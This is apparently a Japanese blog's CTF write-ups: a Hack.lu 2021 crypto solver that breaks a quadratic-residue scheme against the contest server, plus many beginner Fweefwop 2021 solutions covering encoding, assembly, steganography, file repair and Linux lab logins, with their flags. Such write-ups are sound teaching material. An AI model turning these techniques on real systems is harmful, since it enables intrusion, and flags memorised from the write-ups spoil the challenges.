Hack.lu CTF 2021 Writeup

CTF writeup

この大会は2021/10/30 3:00(JST)~2021/11/1 3:00(JST)に開催されました。
今回もチームで参戦。結果は146点で174チーム中119位でした。
自分で解けた問題をWriteupとして書いておきます。

Silver Water Industries (crypto)

サーバの処理概要は以下の通り。

・p: 4で割って1余る素数
・q: 4で割って3余る素数
・N = p * q
・token: ランダム20バイト文字列
・N表示
・tokenの各文字で暗号化をして表示
 ・encryptByte(uint8(b), N)
  ・各bitを取り出し、以下を実行
   ・x: ランダムN未満整数
   ・x = pow(x, 2, N)
   ・bitが1の場合、以下を実行
    ・x = x * -1 % N
  ・xが各bitの暗号結果
・tokenを入力し、当てたらフラグが表示される。

legendreの定理を使って、平方が取れるかどうかを判定し、bitを構成し、tokenを求める。

import socket
import primefac

def recvuntil(s, tail):
    data = ''
    while True:
        if tail in data:
            return data
        data += s.recv(1)

def legendre(a, p):
    return pow(a, (p - 1) // 2, p)

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(('flu.xxx', 20060))

data = recvuntil(s, '\n').rstrip()
print data
N = int(data)

factors = list(primefac.primefac(N))
if int(factors[0]) % 4 == 1:
    p = int(factors[0])
    q = int(factors[1])
else:
    p = int(factors[1])
    q = int(factors[0])

token = ''
for _ in range(20):
    data = recvuntil(s, '\n').rstrip()
    print data
    cs = map(int, data[1:-1].split(' '))
    bits = ''
    for c in cs:
        if legendre(c, q) == 1:
            bits += '0'
        else:
            bits += '1'
    token += chr(int(bits, 2))

print token
s.sendall(token + '\n')
data = recvuntil(s, '\n').rstrip()
print data
data = recvuntil(s, '\n').rstrip()
print data

実行結果は以下の通り。

205201352501296706577599140901269118023
[15551150965336841481303694869076376235 31280307824210708974663470243763905866 29686532167500809255011608954026372858 106309129038325740668553576547575722895 202531659368076325005653483089932408387 36899989699214318343493638727401747895 63095878593574183611076025132760595344 139603090508040346067839585710972344278]
[133511823929658508276605320930926599852 68586205733744541217165989652076854754 95125055626225880615545091125114396233 58406967620528760082049126513783953661 149803365505036756094383920414814034180 55337697109939807564346950612040780505 137524867405573002059152942916469074128 129714072386835569939954105066623406483]
[128649732687775885720385521607178838031 76204584633415310803161678896708350340 204786253625542731010067073941390579527 160304440720186755379605741827373000642 73115465943360493635501681281223039753 159650430042498768063614263507303096475 85361659488918561618080960678978331978 123456508766250080643937363353522254593]
[98425794902769757596716306639794966788 92174663485868637274383535623840358573 75818285289244849967541025638562962176 180289210331278907132862285537725229365 164776478841649708171768154006703309546 196898475808670431539757322983047172971 148808528938083105592657924913417458857 120121982460640324634782225223471183892]
[115056394227165395945251281863618542959 75122527388613039270230125442823485697 117034480692333340306908298750547182987 1438843669871314472396152833444486852 142803248690470930825313585552584556160 91234879379394171868749588702961652271 77412719608943537094763387646810099914 89156390846956305088860301084043650512]
[86192829635697200577218087522899943459 129586423689102613522357277789515638279 155815667661835675814818301461770227888 10212485135984014220307068963077651384 42740615256728263789280142476464602132 7819911283038414646998817462881739972 173779491342105988175201259938793272308 104884949494215628951062126653855559326]
[23457085896895845707206998523185162382 5259437546149171221102572201142630435 185240734713383466650798228124258331001 185955037187995129859497733288068407433 65340204326777479200320970493255444515 72368707321429810047977140074735777164 130475328722169242267617517251537045859 155860175925187117502416307195294074913]
[167333881284315974076689229507936292849 80967121439621246958868367811702953631 129782445878924195241138753525421371721 94541685485544767842606502263635963916 177887553330868767090172627293472689277 146195016766634146570076290040841897575 94228282252782373260284019275845673627 165894835442458505682232521757664908596]
[27627079191803081189498795874627868748 92750378963906147943981362484287300563 131539828540776851482888319039364260983 156297277982273389436032005817584491748 187940581833148381157688334100610426088 69619406525610122532016909182657515854 197014005833487535828398767242650189476 103727650931880287581778336091578488268]
[93359695352067960497958687805523252317 130256350313027598032765038156173064299 182511755067475677810022439401644709497 172720643848505738997457792316018466526 111737541180623808942756845878561402792 114233851666580025244497001560190154445 70535956066086395009129943025469992621 117624415448786377850230056200647559317]
[92285594805332770709094052943031340274 195278675997794609545719313718490751144 66290220940291796682502496143968489379 74582188356191533084742131163342201764 162322236492596447076935974648303224105 122520490762427824874611262823154423125 80342655063526134071906544720414361460 62962578858339846261489550596447930224]
[75038194159941741829719056722047315640 142896132478711771987714869142021478121 121385825808562058103172682192188110478 160822770320337466430249041498628888952 101551593114175050638697193369680021327 138452480906735836204678964256515125740 178242975807969656190357744983715424471 189235561802013679222822581501905164084]
[29208023268952078758314169734331828302 31575796165648827278123934950635425369 129717598372873687829838818378652097018 72627448123432734061519333165084761076 92566789171206206963466118419173482198 140667507776942907234366607998372615819 72045512926442515077667246509030650847 127487924694539321892066736533453851331]
[124160668065795792776067267796896140899 167349962518637938933418758267177534982 113022889506344406365921634984737164844 60649217807726994468712511333963761081 142176351095809333381984017409458561727 100614657831085302527950065195982582902 109657192238613782412584622675817063983 113594650128438423930448472045220085063]
[12624223549004718866784263005147337707 57947195513931203527325943649357945563 27785896821585777774703269039420417306 84698745598981229057306235174243849761 186874597158155713602425267782282008365 159570925999583130335192156674460454845 74976884768597269206124131205506238750 41210158849268768204793917833611736588]
[97435289611410296911178284306527121688 204617103647324192868935876796294159980 80713346298216454647242300111524682952 144361211534468840160576871421355114370 112705443200226417328449002988365186669 9708913692045139739751848467961427225 180144691200330557034140944683713229003 118077983370592709058056959092434914275]
[81349280591429048964841772453198844388 143461533563614820049749141592051885544 17014264063427099447758762678696473142 83752614307257667896895499684774264028 76832960558236829260557562405949352064 66378954906348076753462545555373133579 158644768414361930508332021019700454518 8054683295619130495371596062911939218]
[47728993412305131451931502291552250872 23565345831842523792160044844958492728 96832534655723584168028624329294189834 61901281902075663285491389728930083533 7197696702122637803381123097795861279 113755545563597210552227528438270615155 131204445269445780037258391301346873280 94068747071933819507007583789271536414]
[125552728026235392096233188470748995165 204768855308703680830869863325240086846 102353228058667708035709878745447703302 154851188131576658808473706129586246164 148049793750982061245696908183859447400 39875326904411423450657949118317447750 26823906622662091318638055988729177746 49113285052080237590860162332963904668]
[185614492613659480830200228605006121522 49858624092147477156687742141026495328 14111466418951255666353671900770556827 49246480288598949383181909942870603640 148596901330661963565901746277303701137 204950093608505889253830145585012363982 21406548080121661018862741467018894407 82738943507387042533755879283809695674]
OVGWrpcU4xXvQ8PA7GeO

flag{Oh_NO_aT_LEast_mY_AlGORithM_is_ExpanDiNg}
flag{Oh_NO_aT_LEast_mY_AlGORithM_is_ExpanDiNg}

Fweefwop CTF 2021 Writeup

CTF writeup

この大会は2021/10/23 9:00(JST)~2021/11/1 0:00(JST)に開催されました。
今回もチームで参戦!といっても実質1人チームでした。
結果は29900点の満点で386チーム中4位でした。
自分で解けた問題をWriteupとして書いておきます。

Warm Up -- Let's Start! (General 100)

問題にフラグが書いてあった。

fwopCTF{this_is_the_flag}

Base2 (General 100)

2進数にする問題。

>>> bin(0xe8)[2:]
'11101000'
11101000

Base64 Abridged (General 100)

base64エンコードする問題。

$ echo -n "I love CTF" | base64
SSBsb3ZlIENURg==

SSBsb3ZlIENURg==

Touch the base (General 100)

base64デコードする問題。

$ echo ZndvcENURntiYXNlNjRfaXNfZXZlcnl3aGVyZX0= | base64 -d
fwopCTF{base64_is_everywhere}

fwopCTF{base64_is_everywhere}

Hex the way in (General 100)

ASCIIコードの16進数表記をデコードする問題。

>>> s = '66 77 6f 70 43 54 46 7b 62 61 63 6b 5f 66 72 6f 6d 5f 68 65 78 7d'
>>> s.replace(' ', '').decode('hex')
'fwopCTF{back_from_hex}'
fwopCTF{back_from_hex}

Zeros and Ones (General 100)

2進数をASCIIコードとしてデコードする。

enc = '01100110 01110111 01101111 01110000 01000011 01010100 01000110 01111011 01100011 01101111 01101101 01110000 01101100 01101001 01100011 01100001 01110100 01100101 01100100 01111101'
enc = enc.split(' ')

flag = ''
for c in enc:
    flag += chr(int(c, 2))
print flag

fwopCTF{complicated}

Assembly Warm Up (General 100)

symbolic machine code と呼ばれる言語を答える問題。

Assembly

Jon Us in Discord (General 100)

Discordに入り、#generalチャネルのトピックを見ると、フラグが書いてあった。

fwopCTF{fweefwop_ctf_go_go_go}

Name this language(0) (General 150)

以下のプログラム言語を答える問題。

#include <stdio.h>
int main() {
   printf("Hello, World!");
   return 0;
}

C

Name this language (1) (General 150)

以下のプログラム言語を答える問題。

fn main() {
  println!("Hello World!");
}

rust

Name this language (2) (General 150)

以下のプログラム言語を答える問題。

package main
import "fmt"
func main() {
  fmt.Println("hello world")
}

go

Name this language (3) (General 150)

以下のプログラム言語を答える問題。

PROGRAM Triangle
 IMPLICIT NONE
 REAL :: a, b, c, Area
 PRINT *, 'Welcome, please enter the&
          &lengths of the 3 sides.'
 READ *, a, b, c
 PRINT *, 'Triangle''s area:  ', Area(a,b,c)
END PROGRAM Triangle
FUNCTION Area(x,y,z)
 IMPLICIT NONE
 REAL :: Area            ! function type
 REAL, INTENT( IN ) :: x, y, z
 REAL :: theta, height
 theta = ACOS((x**2+y**2-z**2)/(2.0*x*y))
 height = x*SIN(theta); Area = 0.5*y*height
END FUNCTION Area

Fortran

Name this language (4) (General 150)

以下のプログラム言語を答える問題。

IDENTIFICATION DIVISION.
PROGRAM-ID.  FweefwopProgram.

PROCEDURE DIVISION.
DisplayPrompt.
DISPLAY "Fweefwop Wins!".
STOP RUN.

COBOL

Name this language (5) (General 150)

以下のプログラム言語を答える問題。

(defun fibonacci(n)
  (cond
    ((eq n 1) 0)
    ((eq n 2) 1)
    ((+ (fibonacci (- n 1)) (fibonacci (- n 2))))))))
lisp

Name this language (6) (General 100)

以下のプログラム言語を答える問題。

10 LET N=10
	20 FOR I=1 TO N
	30 PRINT "FweeFwop is FweeFwoping"
	40 NEXT I

BASIC

Name this language (7) (General 150)

以下のプログラム言語を答える問題。

size([],0).
size([H|T],N) :- size(T,N1), N is N1+1.

Prolog

Name this language (8) (General 150)

以下のプログラム言語を答える問題。

let sv (h:t) = p : sv (filter (\x -> x `mod` h /= 0) t) in sv [2..]

Haskell

What's that thing? (0) (General 150)

人間が読めるプログラムを実行可能なマシンコードに変換するのは何かという問題。

compiler

What's that thing? (1) (General 150)

プロセスの一種で、長い間とどまる傾向があり、通常自分では消えない。またsshでドアをノックすると、ドアに応答するということがあるようなものは何かという問題。

daemon

What's that thing? (2) (General 150)

ルーターはレイヤー3で機能し、IPアドレスを処理するが、レイヤー2で動作し、Macアドレスを処理するものは何かという問題。

Switch

What is that thing? (3) (General 150)

無効にすると、pingは機能しないものをフルネーム(4ワード)で答える問題。

Internet Control Message Protocol

Assembly: MOV and ADD (General 150)

mov eax, 0x0902F
add eax, 0x00138

上記のコード実行後、EAXの値を10進数で答える問題。 

>>> 0x0902F + 0x00138
37223
37223

MOV again (General 150)

mov eax, 0x1111
mov ebx, 0x2222
mov eax, ebx

上記のコード実行後、EBXの値を10進数で答える問題。 

>>> 0x2222
8738
8738

Shift (General 150)

mov eax, 0x123
shr eax, 4
shl eax, 8

上記のコード実行後、EBXの値を16進数(0x????)で答える問題。 

>>> eax = 0x123
>>> eax >>= 4
>>> eax <<= 8
>>> hex(eax)
'0x1200'
0x1200

Assembly: Reset a register (General 150)

??? rax, rax

レジスタraxをリセット(値を0に設定)することができる演算子を答える問題。

xor

Assembly: Stack (1) (General 150)

mov eax, 0x123
mov ebx, 0x321
push eax
add eax, 0x111
mov ebx, eax
pop ebx

上記のコード実行後、EBXの値を16進数(0x????)で答える問題。
最終的にpushしたeaxの値をpopしている。

0x123

Assembly: Stack (2) (General 150)

mov eax, 0x123
mov ebx, 0x321
push eax
push ebx
pop eax
pop ebx

上記のコード実行後、EBXの値を16進数(0x????)で答える問題。
eaxとebxに格納した値が入れ替わっている。

0x123

XOR warm up (General 200)

すべての文字を\x01とXORする。

enc = 'gvnqBUGzyns^stmdr|'

flag = ''
for c in enc:
    flag += chr(ord(c) ^ 1)
print flag

fwopCTF{xor_rules}

Modular (0) (General 200)

そのまま計算するだけ。

>>> 3 * 6 % 7
4
4

Modular (1) (General 200)

inverseを使って剰余環上の割り算をする。

from Crypto.Util.number import *

ans = 46 * inverse(11, 59) % 59
print ans

3

Modular (2) (General 200)

modulusの数値が小さいので、ブルートフォースする。

p = 607
for x in range(p):
    if pow(x, 2, p) == 2:
        print x
        break

194

Modular Math (3) (General 150)

ブルートフォースで求める。

for p in range(1, 7001):
    if pow(5, p, 7001) == 1:
        print p
        break

3500

Modular Math (4) (General 400)

m = 31, 
e = 2813771283
n = 384302

とする。

pow(m, pow(m, e)) % n
= pow(m, pow(m, e, phi), n)

n = 384302 = 2 * 17 * 89 * 127
phi = 1 * 16 * 88 * 126

以上のことから計算する。

m = 31
e = 2813771283
n = 384302

phi = 1 * 16 * 88 * 126

ans = pow(m, pow(m, e, phi), n)
print ans

278505

NASM (1) (General 250)

asmファイルが添付されている。

$ nasm -f elf64 hello.asm -o hello.o
$ ld -m elf_x86_64 hello.o -o hello
$ ./hello
fwopCTF{i_have_done_this_ex}

fwopCTF{i_have_done_this_ex}

NASM (2) (General 200)

NASM (1)の問題のasmファイルを1文字修正して、"fwopCTF{i_have_done_this_exercise}"と出力されるようにするには、何に修正するかを答える問題。
以下の部分の0x13がdbから切り出すサイズ。

                :

          mov       rax, 1                  ; system call for write
          mov       rdi, 1                  ; file handle 1 is stdout
          mov       rsi, message            ; address of string to output
          mov       rdx, 0x13               ; number of bytes
          syscall                           ; invoke operating system to do the write

                :

message:  db        "i_have_done_this_exercise_i_swear_but_who_knows"

0x13を0x19にすればよい。

9

Go through some gates (General 300)

f:id:satou-y:20211103231618p:plain
A, B, Cが1の場合、Sの値は何になるかを答える問題。
左上のXORで0、次のXORで1になり、Sは1になる。

1

Assembly: Jump (General 400)

asmファイルが添付されているが、バグがある。asmファイルの以下の箇所を修正してコンパイルする。

■_startの識別が一致させる。

1行目
global    start
    ↓
global    _start

■出力バイト数を13にする

33行目
        mov       edx, 0x0?               ; number of bytes
    ↓
        mov       edx, 0x0d               ; number of bytes
$ nasm -f elf64 jump.asm -o jump.o
$ ld -m elf_x86_64 jump.o -o jump
$ ./jump
fwopCTF{fwop}

fwopCTF{fwop}

Alice in Wonderland? (Forensics 100)

$ strings garden.jpg | grep fwop
Here is a flag "fwopCTF{Beneath_the_surface}".

fwopCTF{Beneath_the_surface}

Just inflate me (Forensics 100)

$ gzip -dc flag.txt.gz 
fwopCTF{ok_you_found_me}

fwopCTF{ok_you_found_me}

The Meta Joke (Forensics 100)

$ exiftool MyCoolCard.jpg | grep fwop
Image Description               : fwopCTF{metadata_is_funky}

fwopCTF{metadata_is_funky}

Not Viewable (Forensics 100)

$ file fflag.txt 
fflag.txt: PNG image data, 405 x 38, 8-bit/color RGBA, non-interlaced
$ mv fflag.txt flag.png

pngとして画像を開く。
f:id:satou-y:20211104080648p:plain

fwopCTF{actually_an_image}

Reading between the Eyes (Forensics 150)

$ zsteg Husky.png 
b1,r,lsb,xy         .. text: "7U>c[rvyzrfM\""
b1,rgb,lsb,xy       .. text: "fwopCTF{r34d1ng_b37w33n_7h3_by73s}/"
b1,abgr,msb,xy      .. text: "[U[wwyUU"
b3,b,lsb,xy         .. text: "?rc%Gw'["
b3,rgb,lsb,xy       .. file: PGP\011Secret Key -
b3,rgba,lsb,xy      .. file: PGP\011Secret Key -
b4,r,lsb,xy         .. text: "wxfveD#0"
b4,g,lsb,xy         .. text: "TETETffx"
b4,b,lsb,xy         .. text: "fwvB34\"TC "
b4,rgba,lsb,xy      .. text: "O`/`/q_`O`O_?N/N"

fwopCTF{r34d1ng_b37w33n_7h3_by73s}

Not the same (Forensics 150)

2つのテキストファイルが与えられている。似て非なるものなので、差分をとる。

$ diff t1.txt t2.txt 
122c122
< f
---
> .
583c583
< w
---
> .
651c651
< o
---
> .
2192c2192
< p
---
> .
2559c2559
< C
---
> .
2758c2758
< T
---
> .
2768c2768
< F
---
> .
2898c2898
< {
---
> .
3650c3650
< r
---
> .
3703c3703
< 3
---
> .
3891c3891
< s
---
> .
4089c4089
< p
---
> .
4297c4297
< 3
---
> .
4304c4304
< c
---
> .
4341c4341
< t
---
> .
4599c4599
< _
---
> .
5314c5314
< t
---
> .
7154c7154
< h
---
> .
8006c8006
< 3
---
> .
8048c8048
< _
---
> .
8110c8110
< d
---
> .
8390c8390
< 1
---
> .
8398c8398
< f
---
> .
8499c8499
< f
---
> .
9002c9002
< }
---
> .

fwopCTF{r3sp3ct_th3_d1ff}

Sharper Image (Forensics 150)

base64のデータが添付されているが、jpgのものと推測できる。このデータをデコードしてみる。

with open('bb.txt', 'r') as f:
    data = f.read()

with open('flag.jpg', 'wb') as f:
    f.write(data.decode('base64'))

f:id:satou-y:20211104081044j:plain
デコードした画像を見てみると、フラグが書いてあった。

fwopCTF{this_is_a_boring_flag}

What's inside of this apple? (Forensics 200)

Stegsolveで開き、[Analyse]-[Data Extract]でRGBのLSBを抽出すると、別のPNGが抽出できる。
f:id:satou-y:20211104081158p:plain
この画像にフラグが書いてあった。

fwopCTF{apple_core_of_course}

Follow the Shiba (Forensics 200)

$ zsteg shiba_with_message.png 
b1,rgb,lsb,xy       .. text: "No flag here, but you can check out https://imgur.com/gallery/jCJcbzZ  "
b2,r,msb,xy         .. text: "WUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU"
b2,g,msb,xy         .. text: ["U" repeated 209 times]
b2,b,lsb,xy         .. text: "ADPUPQ@QP"
b2,abgr,msb,xy      .. text: "[{s[SSsSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS"
b4,r,msb,xy         .. text: ["w" repeated 165 times]
b4,g,lsb,xy         .. text: "wgvfvgvfvwffvwffggfgvwvfwwvvfgffwgfgwgvgwwfgvwvfwgvvvgfwgwvfwwvvvgvgwwvgvwffwgvwwwvgvvfgvgfwfgffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"
b4,g,msb,xy         .. text: ["f" repeated 162 times]
b4,b,lsb,xy         .. text: "EDTDUDEEUDETUEUEUDEDUEDDTDUETDUEUDEETDEETDEUUEDDTEEDTETTUDUUUDUETDUEUDDUUDETUDEDTDUTDDUETEUTTDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"
b4,b,msb,xy         .. text: "**\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\"\""

https://imgur.com/gallery/jCJcbzZにアクセスし、画像をダウンロードする。この画像に対してzstegで確認してみる。

$ zsteg undefined\ -\ Imgur.png 
b1,rgb,lsb,xy       .. text: "here is the flag fwopCTF{steg_is_fun}"
b2,r,msb,xy         .. text: "]UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU"
b2,g,msb,xy         .. text: ["U" repeated 231 times]
b2,b,msb,xy         .. text: "}_UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU"
b2,rgb,msb,xy       .. text: ["U" repeated 182 times]
b2,bgr,msb,xy       .. text: ["U" repeated 182 times]
b2,abgr,msb,xy      .. text: "wWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW"
b3,bgr,msb,xy       .. file: MPEG ADTS, layer I, v2,  96 kbps, Monaural
b3,abgr,msb,xy      .. file: MPEG ADTS, layer I, v2, 112 kbps, Monaural
b4,r,msb,xy         .. text: ["w" repeated 207 times]
b4,g,msb,xy         .. file: MPEG ADTS, layer I, v2, 112 kbps, Monaural
b4,b,msb,xy         .. text: ["w" repeated 207 times]
b4,rgb,msb,xy       .. text: ["w" repeated 108 times]
b4,bgr,msb,xy       .. text: ["w" repeated 108 times]

fwopCTF{steg_is_fun}

Pranked (Forensics 200)

リダイレクトされるが、linkを「リンクのアドレスをコピー」すると、元々のURLがわかる。

https://tinyurl.com/easilypranked
fwopCTF{easilypranked}

What is in this Cookie? (Forensics 200)

$ zsteg download_3.png 
b1,r,lsb,xy         .. text: "?{w((((((((7U="
b1,g,lsb,xy         .. text: ["A" repeated 8 times]
b1,b,lsb,xy         .. text: "\n\n\n\n\n\n\n\n_"
b1,b,msb,xy         .. text: "APPPPPPPP"
b1,rgb,lsb,xy       .. text: "Where is the flag? It must be here somewhere.\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nFwopCTF{ThisIsSoMuchFun}"
b1,rgb,msb,xy       .. text: "tPPPPPPPPPPPPPPPPPPPPPPPPb"
b2,b,msb,xy         .. text: "W!UwUsUwUw"
b2,bgr,msb,xy       .. text: "V75uQVWwuuA"
b2,abgr,msb,xy      .. text: ["S" repeated 8 times]
b3,rgba,lsb,xy      .. text: "?7sw3q?3s?"
b4,r,msb,xy         .. text: "UUUU3UUU"
b4,g,msb,xy         .. text: "wwwwwww7sww"
b4,b,msb,xy         .. text: ["w" repeated 9 times]
b4,rgb,msb,xy       .. text: "gy^gu^ouVo}1"
b4,bgr,msb,xy       .. text: "viW~e_~e_vm7q"

FwopCTF{ThisIsSoMuchFun}

Bitcoin Laundering (0) (Forensics 200)

jsonデータが添付されている。このデータからトランザクション数を答える。
"}," を"},\n"に置換すると、20000行のデータになった。

20000

Bitcoin Laundering (1) (Forensics 400)

アドレス16ftSEQ4ctQFDtVZiUBusQUjRrGhM3JYweが受け取ったBitcoinの総量を答える問題。
jsonデータとして読み込み、'dest_addr'が'16ftSEQ4ctQFDtVZiUBusQUjRrGhM3JYwe'で、'cryptocurrency'が'Bitcoin'になっている'quantity'の合計を計算する。

#!/usr/bin/env python3
import json

with open('transactions.json') as f:
    dic = json.load(f)

sum = 0
for d in dic:
    if d['dest_addr'] == '16ftSEQ4ctQFDtVZiUBusQUjRrGhM3JYwe' \
        and d['cryptocurrency'] == 'Bitcoin':
        sum += d['quantity']

print(sum)

63382.93

Apples & Oranges (Forensics 250)

$ steghide extract -sf Apple.jpg -p oranges
wrote extracted data to "secret.txt".
$ cat secret.txt
fwopctf{which_is_your_favorite}

fwopctf{which_is_your_favorite}

Wood Door (Forensics 250)

Stegsolveで開き、Blue plane 2を見ると、フラグが現れた。
f:id:satou-y:20211104234550p:plain

fwopCTF{hiding_in_bit_plane}

Noise (Forensics 250)

Sonic Visualiserで開き、スペクトログラムを見る。
f:id:satou-y:20211104234654p:plain

FWOPY

Corrupted_File (Forensics 300)

pngヘッダが壊れているので、修正する。

89 24 00 32 -> 89 50 4e 47

ihdrの長さが間違っているので、修正する。

00 00 00 12 -> 00 00 00 0d

すると、修正した画像にフラグが書いてあった。
f:id:satou-y:20211104234824p:plain

fwopCTF{c0rrupted}

Smashed (Forensics 300)

たくさんデータがあるが、データの2個目をインデックスとすると、同じインデックスに対応する文字はすべて同じなので、インデックスの順に文字を並べる。

with open('smashed.txt', 'r') as f:
    data = eval(f.read().rstrip())

m = [''] * 256
for d in data:
    m[d[1]] = d[0]

msg = ''.join(m)
print msg

実行結果は以下の通り。

The Fweefwop CyberSecurity Team is honored to have you participate our first CTF.
 We sincerely hope you had fun and learned something useful. Oh! the flag is
 fwopCTF{kirby_is_the_best_in_super_smash_bros_change_my_mind}
fwopCTF{kirby_is_the_best_in_super_smash_bros_change_my_mind}

Song Naming (Forensics 300)

mp3が添付されているので、歌の名前と、アーティストの名前を答える問題。
https://www.aha-music.com/identify-songs-music-recognition-onlineで識別する。

Title: Shop
Artist: Toby Fox
fwopCTF{shoptobyfox}

Kevin zzZZ (Forensics 400)

$ binwalk kevin_zzZZ.jpg 

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             JPEG image data, JFIF standard 1.01
2227057       0x21FB71        PNG image, 1147 x 1147, 8-bit/color RGB, non-interlaced
2227116       0x21FBAC        Zlib compressed data, default compression
2308197       0x233865        JPEG image data, JFIF standard 1.01

$ foremost kevin_zzZZ.jpg 
Processing: kevin_zzZZ.jpg
|*|

f:id:satou-y:20211104235305p:plain
pngが抽出でき、その画像にはQRコードが書いてある。読み取ると、フラグが現れた。

fwopCTF{rick_fan_are_you_not?}

Linux Lab Level 1 (Linux 100)

$ ssh level0@linux.fweefwop.club
The authenticity of host 'linux.fweefwop.club (34.127.83.18)' can't be established.
ECDSA key fingerprint is SHA256:sm7uInZJMRlNFh5KAi4EP4tNjToVnp4HfK2+Qt4LHRM.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added 'linux.fweefwop.club,34.127.83.18' (ECDSA) to the list of known hosts.
level0@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 13:01:37 2021 from 34.127.83.18
level0@fweefwoplinux:~$ ls -la
total 28
dr-x------  3 level0 level0 4096 Oct 18 01:31 .
drwxr-xr-x 15 root   root   4096 Oct 18 00:12 ..
-r--------  1 level0 level0    5 Oct 18 01:26 .bash_history
-r--r--r--  1 level0 level0  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level0 level0 3526 Apr 18  2019 .bashrc
dr-x--x--x  3 level0 level0 4096 Oct 18 01:25 .gnupg
-r-xr-xr-x  1 level0 level0  807 Apr 18  2019 .profile
-r--r--r--  1 root   root      0 Oct 18 01:29 fwopCTF{level_1_u3xe4}
-rw-r--r--  1 root   root      0 Oct 18 01:31 xx

fwopCTF{level_1_u3xe4}

Linux Lab Level 2 (Linux 100)

$ ssh level1@linux.fweefwop.club
level1@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 12:32:01 2021 from 79.95.87.35
level1@fweefwoplinux:~$ ls -lRa
.:
total 24
dr-x------  3 level1 level1 4096 Oct 18 00:17 .
drwxr-xr-x 15 root   root   4096 Oct 18 00:12 ..
-r--r--r--  1 level1 level1  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level1 level1 3526 Apr 18  2019 .bashrc
-r--r--r--  1 level1 level1  807 Apr 18  2019 .profile
dr-xr-xr-x  2 root   root   4096 Oct 18 00:18 subdir

./subdir:
total 8
dr-xr-xr-x 2 root   root   4096 Oct 18 00:18 .
dr-x------ 3 level1 level1 4096 Oct 18 00:17 ..
-r--r--r-- 1 root   root      0 Oct 18 00:18 fwopCTF{level_2_l46h3}

fwopCTF{level_2_l46h3}

Linux Lab Level 3 (Linux 100)

$ ssh level2@linux.fweefwop.club
level2@linux.fweefwop.club's password: 
Linux fweefwoplinux 4.19.0-17-cloud-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Oct 23 12:33:49 2021 from 79.95.87.35
level2@fweefwoplinux:~$ ls -lRa
.:
total 24
dr-x------  2 level2 level2 4096 Oct 18 00:19 .
drwxr-xr-x 15 root   root   4096 Oct 18 00:12 ..
-r--r--r--  1 level2 level2  220 Apr 18  2019 .bash_logout
-r--r--r--  1 level2 level2 3526 Apr 18  2019 .bashrc
